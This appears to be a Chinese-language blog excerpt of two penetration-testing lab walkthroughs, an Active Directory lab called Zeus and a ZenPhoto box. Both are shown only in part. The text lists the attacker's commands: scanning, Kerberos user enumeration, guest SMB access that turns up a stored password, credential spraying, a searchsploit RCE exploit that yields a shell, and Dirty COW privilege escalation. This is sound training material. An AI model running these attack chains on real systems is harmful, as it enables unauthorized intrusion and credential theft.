ARIES

 Challenge 7 - Zeus(0) 近期又推出了新的 LAB Challenge 7 - Zeus 宙斯，只有三台看來是個 AD 題組 且三台同網段，研判是模擬考試環境三台都對外的 AD 題組 三台都是 Windows 三台都先 Rustscan 掃掃看，└─$ rustscan -a 192.168.116.158 --scripts none --ulimit 5000 | tee rustscan 158 看來是一台 DC 159 看來沒有甚麼 160 看來也沒有甚麼 三台的 snmp 也都沒有效 nmap LDAP Search，└─$ sudo nmap -n -sV -Pn --script ldap-search.nse 192.168.116.158 | tee nmap-ldap-search  網域名稱 : zeus.corp LDAP 物件查詢沒有結果，└─$ ldapsearch -v -x -b "DC=zeus,DC=corp" -H "ldap://192.168.116.158" "(objectclass=*)" 使用者枚舉看看，└─$ ./kerbrute_linux_amd64 userenum --dc 192.168.116.158 -d zeus.corp -o kerbrute-user-enum xato-net-10-million-usernames.txt 跑了一段時間只有枚舉到預設的帳號 administrator、guest SMB 枚舉看看，使用匿名都無法存取，但是帶入 zeus\guest 可以在 .159 發現有個特殊的分享路徑 SQL smb 連線該資料夾，└─$ smbclient \\\\192.168.116.159\\SQL -U 'zeus\guest' 當中有一個檔案 connection.sql，抓回來到 kali 查看檔案發現一組帳號密碼 zeus.corp\db_user:Password123! crackmapexec 測試一下是一組有效的憑證，└─$ crackmapexec smb 192.168.116.158-160 -u db_user -p 'Password123!...

 Proving Grounds Practice : ZenPhoto Walkthrough Foothole (立足點 ) : 80 gobuster 發現 /test 底下有 ZenPhoto CMS，查看 Source Code 確認版本為 1.4.1.4 Searchsploit 發現該版本有 RCE，依據 Exploit 使用後成功拿到 Shell rm 建立 Reverse Shell 成功登入 PE ( 提權 ) : linpeas 發現 dirtycow 髒牛，依據 exploit 利用後提權成功 注意事項 : CMS ZenPhoto Dirtycow Rustscan，└─$ rustscan -a 192.168.171.41 --scripts none --ulimit 5000 | tee rustscan snmp check，└─$ sudo nmap -sU -p 161 192.168.171.41 | tee snmp nmap，└─$ sudo nmap -sCV -A -p 22,23,80,3306 192.168.171.41 | tee nmap    whatweb，└─$ whatweb -v http://192.168.171.41 | tee whatweb    80 / 80 /robots.txt gobuster 80 /，└─$ gobuster -w ./dirfuzzing.txt dir -u http://192.168.171.41 -t 150 -x txt,php,git,pdf | tee gobuster 80 /test，發現 CMS ZENPHOTO 查看 Source Code 發現版本是 1.4.1.4 searchsploit zenphoto 剛好有一個 18030 版本符合且是 RCE 複製內容發現是一個 php 檔案 執行看看，告知 Usage 是 Usage......: php 18083.php <host> <path> 依據範例使用 └─$ php 18083.php 192.168.171.41 /test/ 直接拿到 Shell，且 whoami 有效直接顯示 www-data...